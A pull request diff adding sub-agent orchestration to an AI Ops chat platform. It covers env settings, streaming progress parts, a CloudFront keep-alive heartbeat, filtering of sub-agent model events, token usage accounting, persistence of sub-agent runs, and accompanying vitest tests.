### PR TITLE
feat(aiops): sub-agent orchestration with UI-driven settings and console hardening

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -148,6 +148,19 @@ LANGFUSE_HOST=https://cloud.langfuse.com
 # Skip audit DB writes in local dev
 # SKIP_AUDIT_LOGGING=true
 
+# AI Ops sub-agents (Layer B). SUBAGENTS_ENABLED is an absolute platform
+# kill-switch — tenant settings cannot re-enable it when false.
+# The SUBAGENT_MAX_* vars are CEILINGS that lower (never raise) the built-in
+# maximums a tenant may configure.
+SUBAGENTS_ENABLED=false
+# SUBAGENT_MAX_CONCURRENCY=6
+# SUBAGENT_MAX_PER_RUN=16
+# SUBAGENT_MAX_TOKENS_PER_RUN=1000000
+# SUBAGENT_MAX_ITERATIONS=16
+# SUBAGENT_TIMEOUT_MS=300000
+# Max concurrent shell subprocesses from execute_command (Layer A).
+# TOOL_CONCURRENCY=6
+
 # Internal worker<->web-ui auth key (must match across both apps).
 # REQUIRED for the agent-ops scheduler to work: the workers process sends this
 # as x-internal-key when triggering a scheduled task, and web-ui only trusts the

--- a/.env.example
+++ b/.env.example
@@ -90,35 +90,22 @@ DEFAULT_TENANT_ID=org-default
 # Working memory (Phase 1) — in-session context compaction for long-running agents.
 # When over WORKING_MEMORY_TOKEN_BUDGET estimated tokens, older turns are folded into
 # a rolling summary + scratchpad (via the reflector model) so multi-hour runs survive
-# the context window. Set WORKING_MEMORY_ENABLED=false for identical legacy behavior.
-WORKING_MEMORY_ENABLED=true
 WORKING_MEMORY_TOKEN_BUDGET=60000
 WORKING_MEMORY_KEEP_RECENT=8
 
 # Save-time memory reconciliation (Phase 2) — dedup/contradiction resolution via an
 # LLM judge before writing. Set false to restore blind upserts (legacy behavior).
-MEMORY_RECONCILE_ENABLED=true
 
 # Episodic memory (Phase 3) — capture one distilled episode per tool-using run and
 # replay similar past episodes as few-shot experience at task start.
-EPISODIC_MEMORY_ENABLED=true
 
 # Procedural memory (Phase 4) — learn operating rules from corrections/failures and
 # inject them as '### Operating rules (learned)'; promote matured rules to Skills (human-approved).
-PROCEDURAL_MEMORY_ENABLED=true
 
 # Hermes autonomy + observability
 # MEMORY_LOG_VERBOSE: print full injected memoryContext blocks (summary lines are always on).
-# CHAT_TRIAGE_ENABLED: chat-layer router — conversational messages get a direct reply instead of the agent workflow; the same call auto-picks the skill. false = always run the workflow (legacy behavior).
 # (Auto skill selection/loading has no env flag — it is always available and toggled per-session via the "Auto skills" switch in the AIOps console.)
-# AUTO_SKILL_CREATION_ENABLED: matured procedural domains auto-become/refresh enabled system skills (read-only tier).
-# AUTO_SKILL_MATURITY_THRESHOLD: accessCount a rule needs before promoting.
 MEMORY_LOG_VERBOSE=true
-CHAT_TRIAGE_ENABLED=true
-AUTO_SKILL_CREATION_ENABLED=true
-AUTO_SKILL_MATURITY_THRESHOLD=3
-# SKILL_SYNTHESIS_MIN_RULES: matured rules a domain needs before it earns a synthesized skill.
-SKILL_SYNTHESIS_MIN_RULES=3
 
 # ============================================================================
 # Optional integrations
@@ -148,11 +135,13 @@ LANGFUSE_HOST=https://cloud.langfuse.com
 # Skip audit DB writes in local dev
 # SKIP_AUDIT_LOGGING=true
 
-# AI Ops sub-agents (Layer B). SUBAGENTS_ENABLED is an absolute platform
-# kill-switch — tenant settings cannot re-enable it when false.
+# AI Ops sub-agents (Layer B). The feature is UI-driven: each tenant enables it
+# and tunes its budget from the AI Ops console settings — no env var needed.
+# SUBAGENTS_ENABLED=false is an EMERGENCY deployment-wide kill-switch (tenant
+# settings cannot re-enable while it is set); leave it unset in normal operation.
 # The SUBAGENT_MAX_* vars are CEILINGS that lower (never raise) the built-in
 # maximums a tenant may configure.
-SUBAGENTS_ENABLED=false
+# SUBAGENTS_ENABLED=false
 # SUBAGENT_MAX_CONCURRENCY=6
 # SUBAGENT_MAX_PER_RUN=16
 # SUBAGENT_MAX_TOKENS_PER_RUN=1000000

--- a/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
+++ b/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
@@ -1,6 +1,7 @@
 import { describe, it, expect } from 'vitest';
 import { buildMemoryPart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from '@/app/api/chat/stream-parts';
 import { buildUsagePart } from '../stream-parts';
+import { buildSubagentPart } from '../stream-parts';
 
 const WM_JSON = JSON.stringify({
     summary: 'User asked to connect Jira; site resource retrieved.',
@@ -234,5 +235,32 @@ describe('stripWorkingMemoryPrelude', () => {
 describe('buildUsagePart', () => {
     it('builds a data-usage part', () => {
         expect(buildUsagePart(3, 4)).toEqual({ type: 'data-usage', data: { input: 3, output: 4 } });
+    });
+});
+
+describe('buildSubagentPart', () => {
+    const base = {
+        id: 'sa-1', role: 'EC2 auditor', task: 'audit account 1',
+        toolCount: 3, tokensIn: 900, tokensOut: 120,
+    };
+
+    it('builds a stable id so updates replace rather than append', () => {
+        const part = buildSubagentPart({ ...base, status: 'running' });
+        expect(part.type).toBe('data-subagent');
+        expect(part.id).toBe('subagent-sa-1');
+    });
+
+    it('carries progress counters', () => {
+        const part = buildSubagentPart({ ...base, status: 'running' });
+        expect(part.data).toMatchObject({ role: 'EC2 auditor', status: 'running', toolCount: 3, tokensIn: 900 });
+    });
+
+    it('omits the transcript from the stream payload', () => {
+        const part = buildSubagentPart({
+            ...base, status: 'done', summary: 'found things',
+            transcript: [{ kind: 'ai', text: 'internal reasoning' }],
+        });
+        expect(JSON.stringify(part.data)).not.toContain('internal reasoning');
+        expect((part.data as { summary?: string }).summary).toBe('found things');
     });
 });

--- a/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
+++ b/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from 'vitest';
 import { buildMemoryPart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from '@/app/api/chat/stream-parts';
 import { buildUsagePart } from '../stream-parts';
-import { buildSubagentPart } from '../stream-parts';
+import { buildSubagentPart, buildHeartbeatChunks } from '../stream-parts';
 
 const WM_JSON = JSON.stringify({
     summary: 'User asked to connect Jira; site resource retrieved.',
@@ -262,5 +262,58 @@ describe('buildSubagentPart', () => {
         });
         expect(JSON.stringify(part.data)).not.toContain('internal reasoning');
         expect((part.data as { summary?: string }).summary).toBe('found things');
+    });
+});
+
+// The heartbeat exists solely to keep bytes flowing so CloudFront's 60s
+// originReadTimeout (infra/compute/index.ts:962) can't kill a long run. Its tick
+// body lives here — not inline in route.ts — because nothing in the suite imports
+// route.ts, so an inline tick is untested by construction.
+describe('buildHeartbeatChunks', () => {
+    const base = {
+        id: 'sa-1', role: 'EC2 auditor', task: 'audit account 1',
+        toolCount: 3, tokensIn: 900, tokensOut: 120,
+    };
+
+    it('re-emits one data-subagent part per in-flight sub-agent and no keep-alive', () => {
+        const chunks = buildHeartbeatChunks([
+            { ...base, id: 'sa-1', status: 'running' },
+            { ...base, id: 'sa-2', status: 'running' },
+        ]);
+        expect(chunks).toHaveLength(2);
+        expect(chunks.map((c) => c.type)).toEqual(['data-subagent', 'data-subagent']);
+        expect(chunks.map((c: any) => c.id)).toEqual(['subagent-sa-1', 'subagent-sa-2']);
+        expect(chunks.some((c) => c.type === 'data-keepalive')).toBe(false);
+    });
+
+    // REGRESSION GUARD for F1. `liveSubagents` empties as sub-agents reach their
+    // terminal event, so a tick that only walks that map writes ZERO bytes during
+    // the orchestrator's post-fan-out call — the longest silence and the largest
+    // context in the run, exactly when the 60s origin timeout bites. A tick MUST
+    // write something. This test fails if the empty-case branch is removed.
+    it('emits exactly one keep-alive chunk when no sub-agent is in flight', () => {
+        const chunks = buildHeartbeatChunks([]);
+        expect(chunks).toHaveLength(1);
+        expect(chunks[0].type).toBe('data-keepalive');
+    });
+
+    it('marks the keep-alive transient and gives it no sub-agent fields', () => {
+        const [chunk] = buildHeartbeatChunks([]) as any[];
+        // transient parts are delivered to the client but never appended to
+        // message.parts, so a keep-alive cannot bloat the message or move the reducer.
+        expect(chunk.transient).toBe(true);
+        expect(chunk.id).toBeUndefined();
+        expect(chunk.data).toEqual({});
+        expect(JSON.stringify(chunk)).not.toMatch(/sa-1|EC2 auditor|audit account|transcript/);
+    });
+
+    it('still omits the transcript for a terminal event passed through the tick', () => {
+        const chunks = buildHeartbeatChunks([{
+            ...base, status: 'done', summary: 'found things',
+            transcript: [{ kind: 'ai', text: 'internal reasoning' }],
+        }]);
+        expect(chunks).toHaveLength(1);
+        expect(JSON.stringify(chunks[0])).not.toContain('internal reasoning');
+        expect(JSON.stringify(chunks[0])).not.toContain('transcript');
     });
 });

--- a/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
+++ b/apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts
@@ -1,7 +1,8 @@
 import { describe, it, expect } from 'vitest';
 import { buildMemoryPart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from '@/app/api/chat/stream-parts';
 import { buildUsagePart } from '../stream-parts';
-import { buildSubagentPart, buildHeartbeatChunks } from '../stream-parts';
+import { buildSubagentPart, buildHeartbeatChunks, isSubagentModelEvent } from '../stream-parts';
+import { SUBAGENT_MODEL_TAG } from '@/lib/agent/subagent';
 
 const WM_JSON = JSON.stringify({
     summary: 'User asked to connect Jira; site resource retrieved.',
@@ -315,5 +316,56 @@ describe('buildHeartbeatChunks', () => {
         expect(chunks).toHaveLength(1);
         expect(JSON.stringify(chunks[0])).not.toContain('internal reasoning');
         expect(JSON.stringify(chunks[0])).not.toContain('transcript');
+    });
+});
+
+// Sub-agent model calls run inside ToolNode, so their on_chat_model_* callback
+// events flow through the SAME streamEvents pipeline as the orchestrator's own
+// model runs. The route's text-part machinery is a single-threaded state machine;
+// N concurrent sub-agent runs driving it interleave part ids, the client receives
+// a text-delta for a part that never started, and the AI SDK kills the stream.
+// isSubagentModelEvent is the filter that keeps them out.
+describe('isSubagentModelEvent', () => {
+    it('matches chat-model events tagged by the sub-agent runtime', () => {
+        for (const name of ['on_chat_model_start', 'on_chat_model_stream', 'on_chat_model_end']) {
+            expect(isSubagentModelEvent({ event: name, tags: ['x', SUBAGENT_MODEL_TAG] })).toBe(true);
+        }
+    });
+
+    it('ignores untagged chat-model events (the orchestrator itself)', () => {
+        expect(isSubagentModelEvent({ event: 'on_chat_model_stream', tags: ['seq:step:2'] })).toBe(false);
+        expect(isSubagentModelEvent({ event: 'on_chat_model_stream' })).toBe(false);
+    });
+
+    it('ignores non-chat-model events even when tagged (tool events must still flow)', () => {
+        expect(isSubagentModelEvent({ event: 'on_tool_start', tags: [SUBAGENT_MODEL_TAG] })).toBe(false);
+        expect(isSubagentModelEvent({ event: 'on_chain_stream', tags: [SUBAGENT_MODEL_TAG] })).toBe(false);
+    });
+
+    it('tolerates malformed events', () => {
+        expect(isSubagentModelEvent({})).toBe(false);
+        expect(isSubagentModelEvent({ event: undefined, tags: undefined })).toBe(false);
+    });
+});
+
+describe('buildSubagentPart live-detail fields', () => {
+    const base = {
+        id: 'sa-1', role: 'EC2 auditor', task: 'audit account 1',
+        toolCount: 3, tokensIn: 900, tokensOut: 120,
+    };
+
+    it('stamps a ts so the client can derive startedAt from the first part', () => {
+        const before = Date.now();
+        const part = buildSubagentPart({ ...base, status: 'running' });
+        const ts = (part.data as { ts: number }).ts;
+        expect(ts).toBeGreaterThanOrEqual(before);
+        expect(ts).toBeLessThanOrEqual(Date.now());
+    });
+
+    it('passes lastTool through for the live action line, omitting it when absent', () => {
+        const withTool = buildSubagentPart({ ...base, status: 'running', lastTool: 'aws_read (+2 more)' });
+        expect((withTool.data as { lastTool?: string }).lastTool).toBe('aws_read (+2 more)');
+        const without = buildSubagentPart({ ...base, status: 'running' });
+        expect('lastTool' in (without.data as object)).toBe(false);
     });
 });

--- a/apps/web-ui/app/api/chat/route.ts
+++ b/apps/web-ui/app/api/chat/route.ts
@@ -9,10 +9,11 @@ import { triageChatMessage } from '@/lib/agent/triage';
 import { respondDirect } from './direct-chat';
 import { resolveKnowledgeBaseIds } from '@/lib/agent/auto-kb-select';
 import { acquireThreadLock, releaseThreadLock as releaseThreadLockDb } from '@/lib/agent/thread-lock';
-import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
+import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, buildSubagentPart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
 import { resolveResumedToolCallId, type ResumedPendingCall } from './resume-tool-id';
 import type { PlanStep } from '@/lib/agent/agent-shared';
 import { logRunSummary } from '@/lib/agent/run-timings';
+import type { SubagentEvent } from '@/lib/agent/dispatch-agent-tool';
 
 export const maxDuration = 300; // 5 minutes for complex multi-iteration tasks
 
@@ -225,6 +226,29 @@ export async function POST(req: Request) {
             effectiveKbIds = await resolveKnowledgeBaseIds({ tenantId: resolvedTenantId, selectedIds: null, message: lastUserText, model: resolvedModel });
         }
 
+        // --- Sub-agent progress ---------------------------------------------
+        // Sub-agent tokens deliberately never reach the transcript: three
+        // concurrent streams interleaved into one column are unreadable, and the
+        // narration was never the deliverable. Collapsed cards instead.
+        //
+        // The graph — and dispatch_agent's closure over onSubagentEvent — is
+        // constructed below, before the ReadableStream (and its `controller`)
+        // exists, so emitSubagent cannot enqueue directly here. It buffers
+        // in-flight state into `liveSubagents` and forwards through
+        // `subagentSinkRef.sink`, which processStream's start(controller) wires
+        // up once `controller` is available.
+        const liveSubagents = new Map<string, SubagentEvent>();
+        const subagentSinkRef: { sink: ((chunk: UIMessageChunk) => void) | null } = { sink: null };
+        const emitSubagent = (event: SubagentEvent) => {
+            liveSubagents.set(event.id, event);
+            if (event.status !== 'running') liveSubagents.delete(event.id);
+            try {
+                subagentSinkRef.sink?.(buildSubagentPart(event) as UIMessageChunk);
+            } catch {
+                // Client disconnected — the stream teardown handles it.
+            }
+        };
+
         // Create graph with configuration - supports multi-account
         const graphConfig = {
             model: resolvedModel,
@@ -238,6 +262,7 @@ export async function POST(req: Request) {
             knowledgeBaseIds: effectiveKbIds,       // user pick, or auto-selected KB ids, or []
             userId: resolvedUserId,                 // For memory store scoping
             tenantId: resolvedTenantId,             // For tenant-scoped memory operations
+            onSubagentEvent: emitSubagent,
         };
 
         let graph;
@@ -530,7 +555,9 @@ export async function POST(req: Request) {
                     resolvedTenantId,
                     preRunMessageCount,
                     resumedPendingCalls,
-                    syntheticDecisionResults
+                    syntheticDecisionResults,
+                    liveSubagents,
+                    subagentSinkRef
                 )
             });
         } else {
@@ -695,7 +722,9 @@ function processStream(
     resolvedTenantId?: string,
     preRunMessageCount = 0,
     resumedPendingCalls: ResumedPendingCall[] = [],
-    syntheticDecisionResults: Array<{ toolCallId: string; toolName: string; args: Record<string, unknown>; output: string }> = []
+    syntheticDecisionResults: Array<{ toolCallId: string; toolName: string; args: Record<string, unknown>; output: string }> = [],
+    liveSubagents: Map<string, SubagentEvent> = new Map(),
+    subagentSinkRef: { sink: ((chunk: UIMessageChunk) => void) | null } = { sink: null }
 ): ReadableStream<UIMessageChunk> {
     return new ReadableStream({
         async start(controller) {
@@ -795,6 +824,22 @@ function processStream(
                     return false;
                 }
             };
+
+            // --- Sub-agent progress ---------------------------------------------
+            // `controller` only exists here, so connect the sink that emitSubagent
+            // (bound into dispatch_agent's closure back in POST(), before the
+            // graph existed) has been buffering into `liveSubagents` for.
+            subagentSinkRef.sink = (chunk) => { safeEnqueue(chunk); };
+
+            // CloudFront's originReadTimeout is 60s (infra/compute/index.ts:962). A
+            // sub-agent can think for 90s without producing a byte, so re-emit the
+            // in-flight cards on a timer to keep the connection alive.
+            const HEARTBEAT_MS = 15_000;
+            const heartbeat = setInterval(() => {
+                for (const event of liveSubagents.values()) {
+                    safeEnqueue(buildSubagentPart(event) as UIMessageChunk);
+                }
+            }, HEARTBEAT_MS);
 
             try {
                 if (!safeEnqueue({ type: 'start' })) return;
@@ -1170,6 +1215,13 @@ function processStream(
                     // Ignore if already closed
                 }
             } finally {
+                // Stop the sub-agent heartbeat on every exit path (normal completion,
+                // client abort, or error) — a leaked interval holding a closed
+                // controller is a real leak. Detach the sink too, so a late
+                // emitSubagent call (a sub-agent finishing just as teardown starts)
+                // can't reach a closed controller through safeEnqueue's stale closure.
+                clearInterval(heartbeat);
+                subagentSinkRef.sink = null;
 
                 // Emit the per-run timing breakdown regardless of how the run ended,
                 // so aborted and errored runs are measured too.

--- a/apps/web-ui/app/api/chat/route.ts
+++ b/apps/web-ui/app/api/chat/route.ts
@@ -9,7 +9,7 @@ import { triageChatMessage } from '@/lib/agent/triage';
 import { respondDirect } from './direct-chat';
 import { resolveKnowledgeBaseIds } from '@/lib/agent/auto-kb-select';
 import { acquireThreadLock, releaseThreadLock as releaseThreadLockDb } from '@/lib/agent/thread-lock';
-import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, buildSubagentPart, buildHeartbeatChunks, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
+import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, buildSubagentPart, buildHeartbeatChunks, buildActiveSkillPart, humanizeReflection, humanizePlanning, isSubagentModelEvent, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
 import { resolveResumedToolCallId, type ResumedPendingCall } from './resume-tool-id';
 import type { PlanStep } from '@/lib/agent/agent-shared';
 import { logRunSummary } from '@/lib/agent/run-timings';
@@ -576,7 +576,8 @@ export async function POST(req: Request) {
                     resumedPendingCalls,
                     syntheticDecisionResults,
                     liveSubagents,
-                    subagentSinkRef
+                    subagentSinkRef,
+                    effectiveSkill ? { slug: effectiveSkill, source: selectedSkill ? 'user' as const : 'auto' as const } : null
                 )
             });
         } else {
@@ -743,7 +744,8 @@ function processStream(
     resumedPendingCalls: ResumedPendingCall[] = [],
     syntheticDecisionResults: Array<{ toolCallId: string; toolName: string; args: Record<string, unknown>; output: string }> = [],
     liveSubagents: Map<string, SubagentEvent> = new Map(),
-    subagentSinkRef: { sink: ((chunk: UIMessageChunk) => void) | null } = { sink: null }
+    subagentSinkRef: { sink: ((chunk: UIMessageChunk) => void) | null } = { sink: null },
+    activeSkill: { slug: string; source: 'user' | 'auto' } | null = null
 ): ReadableStream<UIMessageChunk> {
     return new ReadableStream({
         async start(controller) {
@@ -869,6 +871,12 @@ function processStream(
             try {
                 if (!safeEnqueue({ type: 'start' })) return;
 
+                // Surface the run's ACTIVE skill (incl. triage auto-selection) so the
+                // rail can show it — a loaded skill must never be invisible.
+                if (activeSkill) {
+                    safeEnqueue(buildActiveSkillPart(activeSkill.slug, activeSkill.source) as UIMessageChunk);
+                }
+
                 // When resuming from HITL approval, emit text content first
                 // The tool-input events will be emitted in on_tool_start for each tool
                 if (isResumedFromApproval && approvedToolId) {
@@ -907,10 +915,33 @@ function processStream(
                             event.event.startsWith("on_chat_model_") &&
                             event.metadata?.langgraph_node === 'guard';
 
-                        if (isGuardModelRun) {
+                        // Sub-agent model calls run inside ToolNode and MUST NOT drive
+                        // this single-threaded text-part state machine: N concurrent
+                        // sub-agents interleaving through currentPartId/streamStarted
+                        // emit deltas for parts that never started, which kills the
+                        // client stream — and their narration would leak into the
+                        // transcript. Their progress reaches the client only as
+                        // data-subagent parts (emitSubagent).
+                        const isSubagentModelRun = isSubagentModelEvent(event as { event?: string; tags?: string[] });
+
+                        if (isGuardModelRun || isSubagentModelRun) {
                             // Skip start/stream/end entirely. streamStarted stays false
                             // (the previous run's on_chat_model_end already closed its
                             // part), so nothing downstream references a dangling part id.
+                            //
+                            // Sub-agent tokens are still BILLED tokens: keep them in the
+                            // run's usage counter even though the text/phase machinery
+                            // never sees these runs.
+                            if (isSubagentModelRun && event.event === 'on_chat_model_end') {
+                                const subUsage = (event.data?.output as { usage_metadata?: { input_tokens?: number; output_tokens?: number } } | undefined)?.usage_metadata;
+                                const subIn = Number(subUsage?.input_tokens) || 0;
+                                const subOut = Number(subUsage?.output_tokens) || 0;
+                                if (subIn || subOut) {
+                                    runUsage.input += subIn;
+                                    runUsage.output += subOut;
+                                    safeEnqueue(buildUsagePart(subIn, subOut) as UIMessageChunk);
+                                }
+                            }
                         }
                         else if (event.event === "on_chat_model_start") {
                             const node = event.metadata?.langgraph_node;

--- a/apps/web-ui/app/api/chat/route.ts
+++ b/apps/web-ui/app/api/chat/route.ts
@@ -9,7 +9,7 @@ import { triageChatMessage } from '@/lib/agent/triage';
 import { respondDirect } from './direct-chat';
 import { resolveKnowledgeBaseIds } from '@/lib/agent/auto-kb-select';
 import { acquireThreadLock, releaseThreadLock as releaseThreadLockDb } from '@/lib/agent/thread-lock';
-import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, buildSubagentPart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
+import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, buildSubagentPart, buildHeartbeatChunks, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
 import { resolveResumedToolCallId, type ResumedPendingCall } from './resume-tool-id';
 import type { PlanStep } from '@/lib/agent/agent-shared';
 import { logRunSummary } from '@/lib/agent/run-timings';
@@ -852,11 +852,17 @@ function processStream(
 
             // CloudFront's originReadTimeout is 60s (infra/compute/index.ts:962). A
             // sub-agent can think for 90s without producing a byte, so re-emit the
-            // in-flight cards on a timer to keep the connection alive.
+            // in-flight cards on a timer to keep the connection alive. The tick body
+            // is buildHeartbeatChunks (stream-parts.ts) — pure and tested — and it
+            // ALWAYS yields at least one chunk: `liveSubagents` empties as sub-agents
+            // finish, and the orchestrator's post-fan-out call is the longest silence
+            // in the run, so a map-dependent tick would go quiet exactly when the
+            // timeout bites. Nothing may be inserted between this setInterval and the
+            // `try` below — the matching clearInterval lives in that try's finally.
             const HEARTBEAT_MS = 15_000;
             const heartbeat = setInterval(() => {
-                for (const event of liveSubagents.values()) {
-                    safeEnqueue(buildSubagentPart(event) as UIMessageChunk);
+                for (const chunk of buildHeartbeatChunks(liveSubagents.values())) {
+                    safeEnqueue(chunk);
                 }
             }, HEARTBEAT_MS);
 

--- a/apps/web-ui/app/api/chat/route.ts
+++ b/apps/web-ui/app/api/chat/route.ts
@@ -14,6 +14,7 @@ import { resolveResumedToolCallId, type ResumedPendingCall } from './resume-tool
 import type { PlanStep } from '@/lib/agent/agent-shared';
 import { logRunSummary } from '@/lib/agent/run-timings';
 import type { SubagentEvent } from '@/lib/agent/dispatch-agent-tool';
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
 
 export const maxDuration = 300; // 5 minutes for complex multi-iteration tasks
 
@@ -241,7 +242,25 @@ export async function POST(req: Request) {
         const subagentSinkRef: { sink: ((chunk: UIMessageChunk) => void) | null } = { sink: null };
         const emitSubagent = (event: SubagentEvent) => {
             liveSubagents.set(event.id, event);
-            if (event.status !== 'running') liveSubagents.delete(event.id);
+            if (event.status !== 'running') {
+                liveSubagents.delete(event.id);
+                // Persist so a collapsed card survives a reload. Fire-and-forget: a
+                // persistence failure must never break the run. The repository redacts
+                // secrets before the write.
+                getSubagentRunRepository().save({
+                    tenantId: resolvedTenantId,
+                    threadId,
+                    subagentId: event.id,
+                    role: event.role,
+                    task: event.task,
+                    status: event.status,
+                    toolCount: event.toolCount,
+                    tokensIn: event.tokensIn,
+                    tokensOut: event.tokensOut,
+                    summary: event.summary ?? null,
+                    transcript: event.transcript ?? null,
+                }).catch(err => console.error('[Chat] Failed to persist sub-agent run:', err));
+            }
             try {
                 subagentSinkRef.sink?.(buildSubagentPart(event) as UIMessageChunk);
             } catch {

--- a/apps/web-ui/app/api/chat/route.ts
+++ b/apps/web-ui/app/api/chat/route.ts
@@ -12,6 +12,7 @@ import { acquireThreadLock, releaseThreadLock as releaseThreadLockDb } from '@/l
 import { buildPlanPart, buildPhasePart, buildInterruptParts, buildMemoryPart, buildUsagePart, humanizeReflection, humanizePlanning, isWorkingMemoryPayload, stripWorkingMemoryPrelude } from './stream-parts';
 import { resolveResumedToolCallId, type ResumedPendingCall } from './resume-tool-id';
 import type { PlanStep } from '@/lib/agent/agent-shared';
+import { logRunSummary } from '@/lib/agent/run-timings';
 
 export const maxDuration = 300; // 5 minutes for complex multi-iteration tasks
 
@@ -1169,6 +1170,10 @@ function processStream(
                     // Ignore if already closed
                 }
             } finally {
+
+                // Emit the per-run timing breakdown regardless of how the run ended,
+                // so aborted and errored runs are measured too.
+                if (threadId) logRunSummary(threadId);
 
                 // Persist NEW messages from this turn to chat history
                 if (threadId && graph && config && resolvedUserId) {

--- a/apps/web-ui/app/api/chat/stream-parts.ts
+++ b/apps/web-ui/app/api/chat/stream-parts.ts
@@ -1,3 +1,4 @@
+import type { UIMessageChunk } from 'ai';
 import { pendingToolCallsOf } from '@/lib/agent/guard';
 import { extractJsonObject } from '@/lib/agent/llm-json';
 import type { GuardVerdict, PlanStep, ReflectionState } from '@/lib/agent/agent-shared';
@@ -52,6 +53,38 @@ export function buildSubagentPart(event: SubagentEvent): DataPart {
             ...(event.summary ? { summary: event.summary } : {}),
         },
     };
+}
+
+/**
+ * The body of the sub-agent heartbeat tick, as a pure function so it is testable
+ * (nothing in the suite imports route.ts, so an inline tick body has no coverage
+ * at all).
+ *
+ * Two jobs, and the second one is the whole reason the heartbeat exists:
+ *  - re-emit a card for every sub-agent still in flight, so a sub-agent that
+ *    thinks for 90s without producing a byte still refreshes its card;
+ *  - guarantee the tick writes SOMETHING even when nothing is in flight. The
+ *    caller's live map empties as sub-agents reach their terminal event, and the
+ *    orchestrator's post-fan-out call — every sub-agent's findings in the prompt —
+ *    is both the longest silence and the largest context in the run. A
+ *    map-dependent tick would protect the cheap window and go silent through the
+ *    expensive one, which is exactly the connection CloudFront's 60s
+ *    originReadTimeout (infra/compute/index.ts:962) drops.
+ *
+ * The keep-alive is `transient`, so the client receives the bytes but never
+ * appends the part to `message.parts`: it cannot bloat the message and
+ * `deriveRunState` (components/agent/chat/run-state.ts) has no case for
+ * `data-keepalive`, so it touches no UI state.
+ */
+export function buildHeartbeatChunks(live: Iterable<SubagentEvent>): UIMessageChunk[] {
+    const chunks: UIMessageChunk[] = [];
+    for (const event of live) {
+        chunks.push(buildSubagentPart(event));
+    }
+    if (chunks.length === 0) {
+        chunks.push({ type: 'data-keepalive', data: {}, transient: true });
+    }
+    return chunks;
 }
 
 // Exact markers from planning-agent.ts's reflectNode `feedback` template (do not

--- a/apps/web-ui/app/api/chat/stream-parts.ts
+++ b/apps/web-ui/app/api/chat/stream-parts.ts
@@ -1,6 +1,7 @@
 import { pendingToolCallsOf } from '@/lib/agent/guard';
 import { extractJsonObject } from '@/lib/agent/llm-json';
 import type { GuardVerdict, PlanStep, ReflectionState } from '@/lib/agent/agent-shared';
+import type { SubagentEvent } from '@/lib/agent/dispatch-agent-tool';
 
 export interface DataPart { type: `data-${string}`; id?: string; data: unknown }
 
@@ -25,6 +26,32 @@ export function buildMemoryPart(op: 'recall' | 'save', summary: string): DataPar
     const bulletMatches = summary.match(/^[-*•]\s/gm);
     const count = bulletMatches ? bulletMatches.length : null;
     return { type: 'data-memory', data: { op, summary, count } };
+}
+
+/**
+ * One data-subagent part per sub-agent state change. The `id` is stable per
+ * sub-agent so the client replaces the card in place rather than appending a new
+ * one on every progress tick.
+ *
+ * The transcript is deliberately NOT sent: it can be large, and the whole point
+ * of sub-agents is keeping bulk out of the transcript. It is persisted
+ * separately and fetched on demand when a card is expanded.
+ */
+export function buildSubagentPart(event: SubagentEvent): DataPart {
+    return {
+        type: 'data-subagent',
+        id: `subagent-${event.id}`,
+        data: {
+            id: event.id,
+            role: event.role,
+            task: event.task,
+            status: event.status,
+            toolCount: event.toolCount,
+            tokensIn: event.tokensIn,
+            tokensOut: event.tokensOut,
+            ...(event.summary ? { summary: event.summary } : {}),
+        },
+    };
 }
 
 // Exact markers from planning-agent.ts's reflectNode `feedback` template (do not

--- a/apps/web-ui/app/api/chat/stream-parts.ts
+++ b/apps/web-ui/app/api/chat/stream-parts.ts
@@ -3,8 +3,28 @@ import { pendingToolCallsOf } from '@/lib/agent/guard';
 import { extractJsonObject } from '@/lib/agent/llm-json';
 import type { GuardVerdict, PlanStep, ReflectionState } from '@/lib/agent/agent-shared';
 import type { SubagentEvent } from '@/lib/agent/dispatch-agent-tool';
+import { SUBAGENT_MODEL_TAG } from '@/lib/agent/subagent';
 
 export interface DataPart { type: `data-${string}`; id?: string; data: unknown }
+
+/**
+ * True for chat-model callback events that belong to a SUB-AGENT's model calls,
+ * which run inside ToolNode and therefore surface through the orchestrator's
+ * own streamEvents pipeline. The route's text-part state machine is single-
+ * threaded (one currentPartId/streamStarted/runMode); letting N concurrent
+ * sub-agent model runs drive it interleaves their events, emits text-deltas for
+ * part ids whose text-start belonged to a different run, and the AI SDK client
+ * kills the stream ("text-delta for missing text part"). It also leaks
+ * sub-agent narration into the transcript, which the design forbids. The route
+ * must skip these events entirely — sub-agent progress reaches the client only
+ * as data-subagent parts.
+ */
+export function isSubagentModelEvent(event: { event?: string; tags?: string[] }): boolean {
+    return typeof event.event === 'string'
+        && event.event.startsWith('on_chat_model_')
+        && Array.isArray(event.tags)
+        && event.tags.includes(SUBAGENT_MODEL_TAG);
+}
 
 export function buildPlanPart(threadId: string, steps: PlanStep[], updatedBy: string): DataPart {
